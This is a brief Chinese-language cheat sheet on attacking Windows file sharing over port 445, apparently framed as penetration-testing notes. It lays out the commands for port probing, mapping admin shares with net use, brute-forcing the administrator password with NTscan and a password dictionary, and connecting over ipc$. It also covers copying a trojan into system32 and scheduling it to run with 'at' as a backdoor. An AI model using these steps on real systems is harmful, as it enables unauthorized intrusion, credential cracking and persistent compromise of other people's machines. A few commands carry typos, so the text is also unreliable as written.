# 445 端口
TCP, 开放文件共享服务的端口号,毁誉参半,允许你在局域网中访问共享文件,又容易被 HACK,建议自己关掉
# 端口测试
手工测试
telnet ip 端口 // |
scanport 工具探测从开始 IP 到结束 IP 一系列端口号
# 映射共享文件夹
net use f: \\10.1.1.2\share 密码 /uesr:用户 | |
// 10.1.1.2为共享文件夹所在的网址,share为共享文件名,用户,密码为服务器管理员用户和密码名,将改文件共享为自己本地F盘 |
net use f: /del | |
net use * /del | |
删除 |
net use f: \\10.1.1.2\c$ 密码 /user //将其C盘映射到本地F |
snet use \\10.1.1.2\ipc$ 密码 /user //建立空连接,即可利用网络连接控制其全部磁盘即电脑 | |
例如 dir \\10.1.1.2\share查看10.1.1.2的share文件 |
# 攻击工具包
NTscan,ScanPort, 真空密码生成器
生成密码字典,NTscan 暴力破解目标 IP 的系统密码。拿到 admin 账户。
# 连接
net use \\10.1.1.2\ipc$ mima /user:user //远程连接目标IP。 |
连接后即可对 IP 进行任何指令操作,因为我们是 ADMIN.
# 留后门
一般手段为留木马文件,木马自己搞
制作后用 copy 命令植入木马,copy 命令见作者 DOS 篇
下边代码留后门用
copy d:\hack.exe \\10.1.1.2\c$\windows\system32 //将back door 拷贝到它的较为隐藏的文件夹下 |
net time //查看其时间 |
at \\10.1.1.2 11:19 "c:\windows\system32\heihei.exe" //在已经ipc$的主机发作业,让他在11.19打开exe |
at \\10.1.1.2 //查看主机的作业表 |
利用作业表可以查询作业是否做完
# 写报告
渗透测试报告。
